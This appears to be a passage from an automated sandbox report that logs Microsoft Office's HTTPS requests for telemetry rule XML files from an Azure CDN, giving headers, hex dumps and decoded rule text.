                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            84192.168.2.54982213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:35 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                            x-ms-request-id: 898dd9bc-901e-0048-53d2-2cb800000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133935Z-16547b76f7fj897nhC1DFWdwq400000006hg00000000a5n8
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            85192.168.2.54983113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:36 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                            x-ms-request-id: 7ec302fb-401e-0067-4b00-2f09c2000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133936Z-17df447cdb5tcj54hC1DFW3yew0000000320000000001kby
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            86192.168.2.54983413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:36 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                            x-ms-request-id: 229e582e-901e-0083-26d2-2cbb55000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133936Z-16547b76f7f67wxlhC1DFWah9w00000006rg000000004ur1
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            87192.168.2.54983213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:36 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                            x-ms-request-id: 776f9dcf-101e-008d-0d60-2e92e5000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133936Z-15869dbbcc65c582hC1DFW2xkc00000007000000000038r8
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            88192.168.2.54983313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:36 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 405
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                            x-ms-request-id: 72e3f643-801e-007b-5dd2-2ce7ab000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133936Z-16547b76f7fwvr5dhC1DFW2c9400000006k000000000bzvb
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:36 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            89192.168.2.54984213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:37 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 174
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                            x-ms-request-id: ed27c552-101e-007a-705f-2e047e000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133937Z-15869dbbcc65c582hC1DFW2xkc000000070g000000001z84
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            90192.168.2.54985313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:37 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1952
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                            x-ms-request-id: c4c8fc32-f01e-0096-298e-2d10ef000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133937Z-15869dbbcc6kg5mvhC1DFWgs2s00000001hg000000001rc7
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            91192.168.2.54985413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:37 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 958
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                            x-ms-request-id: 4af2a91d-f01e-00aa-46e0-2e8521000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133937Z-17df447cdb5rrj6shC1DFW6qg400000002ug000000004am3
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            92192.168.2.54985513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:37 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 501
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                            x-ms-request-id: 62c29a92-201e-003c-094f-2e30f9000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133937Z-15869dbbcc6kg5mvhC1DFWgs2s00000001hg000000001rcp
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:37 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            93192.168.2.54985613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:38 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 2592
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                            x-ms-request-id: 289a03c5-801e-0015-6466-2ff97f000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133938Z-15869dbbcc6zbpm7hC1DFW73ew00000001mg000000005ct5
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
